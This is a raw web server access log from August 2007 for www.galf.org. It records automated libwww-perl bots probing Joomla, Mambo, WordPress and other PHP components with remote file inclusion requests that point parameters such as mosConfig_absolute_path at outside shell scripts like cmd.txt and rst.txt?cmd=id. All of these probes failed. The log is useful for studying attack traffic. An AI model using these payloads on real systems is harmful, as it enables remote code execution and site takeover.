84.191.97.217 - - [27/Aug/2007:12:00:50 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:12:01:48 -0700] "GET /logs/access_070716.log//plugins/spamx/MTBlackList.Examine.class.php?_CONF%5bpath%5d=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:12:01:48 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:12:01:52 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:12:01:52 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.52.56.49 - - [27/Aug/2007:12:05:02 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.52.56.49 - - [27/Aug/2007:12:05:03 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.24.37 - - [27/Aug/2007:12:06:56 -0700] "GET /logs/access_070108.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:12:06:57 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.140.211.10 - - [27/Aug/2007:12:10:44 -0700] "GET /logs/access_070806.log/supportticket//include/main.php?config[search_disp]=true&include_dir=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.140.211.10 - - [27/Aug/2007:12:10:45 -0700] "GET /supportticket//include/main.php?config[search_disp]=true&include_dir=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.140.211.10 - - [27/Aug/2007:12:10:46 -0700] "GET /logs/supportticket//include/main.php?config[search_disp]=true&include_dir=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.140.211.10 - - [27/Aug/2007:12:10:47 -0700] "GET /logs/access_070716.log/supportticket//include/main.php?config[search_disp]=true&include_dir=http://148.245.107.2/.ssh/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.118.104.72 - - [27/Aug/2007:12:10:55 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.avgwarez.altervista.org/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.23.24 - - [27/Aug/2007:12:12:21 -0700] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.181.89.119 - - [27/Aug/2007:12:13:42 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/shellku/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.181.89.119 - - [27/Aug/2007:12:13:42 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/shellku/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:12:14:13 -0700] "GET /logs/access_070716.log/index.php?go=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:12:14:14 -0700] "GET /index.php?go=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:12:14:14 -0700] "GET /logs/index.php?go=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.172.32.44 - - [27/Aug/2007:12:15:05 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.172.32.44 - - [27/Aug/2007:12:15:05 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.172.32.44 - - [27/Aug/2007:12:15:06 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.172.32.44 - - [27/Aug/2007:12:15:24 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.172.32.44 - - [27/Aug/2007:12:15:24 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.172.32.44 - - [27/Aug/2007:12:15:24 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
195.242.211.140 - - [27/Aug/2007:12:16:17 -0700] "GET /logs/sign/index.php?show=http://badmus.by.ru/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
195.242.211.140 - - [27/Aug/2007:12:16:17 -0700] "GET /sign/index.php?show=http://badmus.by.ru/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
72.32.181.82 - - [27/Aug/2007:12:16:20 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.181.82 - - [27/Aug/2007:12:16:20 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.181.82 - - [27/Aug/2007:12:16:20 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.32.181.82 - - [27/Aug/2007:12:16:20 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.181.82 - - [27/Aug/2007:12:16:21 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.181.82 - - [27/Aug/2007:12:16:21 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.172.32.44 - - [27/Aug/2007:12:16:21 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.172.32.44 - - [27/Aug/2007:12:16:22 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.172.32.44 - - [27/Aug/2007:12:16:22 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.160.58.97 - - [27/Aug/2007:12:16:22 -0700] "GET /logs/access_070618.log/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.160.58.97 - - [27/Aug/2007:12:16:22 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.160.58.97 - - [27/Aug/2007:12:16:23 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:12:16:41 -0700] "GET /logs/access_070716.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.160.58.97 - - [27/Aug/2007:12:18:32 -0700] "GET /logs/access_070611.log/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.181.82 - - [27/Aug/2007:12:18:36 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.32.181.82 - - [27/Aug/2007:12:18:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.181.82 - - [27/Aug/2007:12:18:36 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.118.104.72 - - [27/Aug/2007:12:22:15 -0700] "GET /logs/access_070618.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.avgwarez.altervista.org/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.104.72 - - [27/Aug/2007:12:22:15 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.avgwarez.altervista.org/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.153.252.55 - - [27/Aug/2007:12:23:48 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.153.252.55 - - [27/Aug/2007:12:23:49 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.153.252.55 - - [27/Aug/2007:12:23:49 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.2.247.210 - - [27/Aug/2007:12:24:03 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [27/Aug/2007:12:24:04 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [27/Aug/2007:12:24:05 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [27/Aug/2007:12:24:22 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
62.2.247.210 - - [27/Aug/2007:12:24:22 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [27/Aug/2007:12:24:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.204.11.65 - - [27/Aug/2007:12:25:08 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://loooool.altervista.org/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.204.11.65 - - [27/Aug/2007:12:25:09 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://loooool.altervista.org/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.2.247.210 - - [27/Aug/2007:12:25:59 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [27/Aug/2007:12:26:00 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [27/Aug/2007:12:26:00 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.3.166.163 - - [27/Aug/2007:12:26:34 -0700] "GET //admin/system/include.php?start=1&skindir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
212.59.7.10 - - [27/Aug/2007:12:27:31 -0700] "GET /logs/access_070723.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.55.208.231 - - [27/Aug/2007:12:30:59 -0700] "GET /logs/access_070709.log HTTP/1.0" 200 1048576 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:12:32:10 -0700] "GET /logs/access_070723.log//plugins/spamx/MTBlackList.Examine.class.php?_CONF%5bpath%5d=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:12:32:18 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
90.35.104.237 - - [27/Aug/2007:12:34:14 -0700] "GET / HTTP/1.0" 200 1032 "http://www.courbis.fr" "Courbis, Acteur de l'Internet depuis 1988" "www.galf.org"
62.181.89.119 - - [27/Aug/2007:12:35:59 -0700] "GET /logs/access_070716.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/shellku/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.181.89.119 - - [27/Aug/2007:12:35:59 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/shellku/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.181.89.119 - - [27/Aug/2007:12:35:59 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/shellku/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.181.82 - - [27/Aug/2007:12:35:59 -0700] "GET /logs/access_070813.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.204.11.65 - - [27/Aug/2007:12:36:46 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://loooool.altervista.org/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
194.204.11.65 - - [27/Aug/2007:12:36:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://loooool.altervista.org/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
194.204.11.65 - - [27/Aug/2007:12:36:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://loooool.altervista.org/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.204.11.65 - - [27/Aug/2007:12:36:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://loooool.altervista.org/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
203.192.130.34 - - [27/Aug/2007:12:37:22 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.americanhcare.com/_resumes/ayastar/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.181.89.119 - - [27/Aug/2007:12:37:30 -0700] "GET /logs/access_070618.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/shellku/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.239.89.26 - - [27/Aug/2007:12:38:49 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.239.89.26 - - [27/Aug/2007:12:38:49 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.207.232.158 - - [27/Aug/2007:12:44:21 -0700] "GET /logs/omponents/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
89.207.232.158 - - [27/Aug/2007:12:44:21 -0700] "GET /omponents/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:12:47:04 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:12:47:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.76 - - [27/Aug/2007:12:47:54 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.76 - - [27/Aug/2007:12:47:54 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.197.131.44 - - [27/Aug/2007:12:48:41 -0700] "GET /components/com_webring/admin.webring.docs.php?component_dir=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.197.131.44 - - [27/Aug/2007:12:48:48 -0700] "GET /logs/components/com_webring/admin.webring.docs.php?component_dir=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.153.252.55 - - [27/Aug/2007:12:51:14 -0700] "GET /logs/access_070813.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.20.65.213 - - [27/Aug/2007:12:54:02 -0700] "GET /logs/components/com_mospray/scripts/admin.php?basedir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.20.65.213 - - [27/Aug/2007:12:54:02 -0700] "GET /components/com_mospray/scripts/admin.php?basedir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.58.105.162 - - [27/Aug/2007:12:54:52 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.58.105.162 - - [27/Aug/2007:12:54:53 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.197.131.44 - - [27/Aug/2007:12:55:09 -0700] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.197.131.44 - - [27/Aug/2007:12:55:10 -0700] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.76 - - [27/Aug/2007:12:55:27 -0700] "GET /administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.76 - - [27/Aug/2007:12:55:27 -0700] "GET /logs/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.216.236.100 - - [27/Aug/2007:12:55:28 -0700] "GET /logs/http://www.trilhaecia.tur.br/pem/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [27/Aug/2007:12:55:29 -0700] "GET /http://www.trilhaecia.tur.br/pem/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.49.173.97 - - [27/Aug/2007:12:56:19 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.49.173.97 - - [27/Aug/2007:12:56:19 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.247.210 - - [27/Aug/2007:12:58:18 -0700] "GET /logs/access_070813.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.21 - - [27/Aug/2007:12:58:57 -0700] "GET /logs/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.37.212.21 - - [27/Aug/2007:12:58:57 -0700] "GET /components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.173.251.138 - - [27/Aug/2007:12:59:40 -0700] "GET /logs/main.php?id=http://vidi.dk/language/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.173.251.138 - - [27/Aug/2007:12:59:40 -0700] "GET /main.php?id=http://vidi.dk/language/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.37.212.76 - - [27/Aug/2007:13:00:05 -0700] "GET /components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.76 - - [27/Aug/2007:13:00:05 -0700] "GET /logs/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.237.123.245 - - [27/Aug/2007:13:02:00 -0700] "GET /logs/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.237.123.245 - - [27/Aug/2007:13:02:00 -0700] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://maamria.100webspace.net/rep.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:13:03:02 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.153.252.55 - - [27/Aug/2007:13:03:16 -0700] "GET /logs/access.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.153.252.55 - - [27/Aug/2007:13:03:17 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.153.252.55 - - [27/Aug/2007:13:03:17 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
201.47.19.52 - - [27/Aug/2007:13:04:41 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://giks.net/php/x/rst.txt?cmd=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:05:29 -0700] "GET /logs/access_070813.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:05:29 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:13:05:30 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
24.69.67.10 - - [27/Aug/2007:13:06:04 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.194.149.56 - - [27/Aug/2007:13:07:01 -0700] "GET /logs/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.194.149.56 - - [27/Aug/2007:13:07:01 -0700] "GET /administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.21.73.27 - - [27/Aug/2007:13:09:52 -0700] "GET /logs/http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
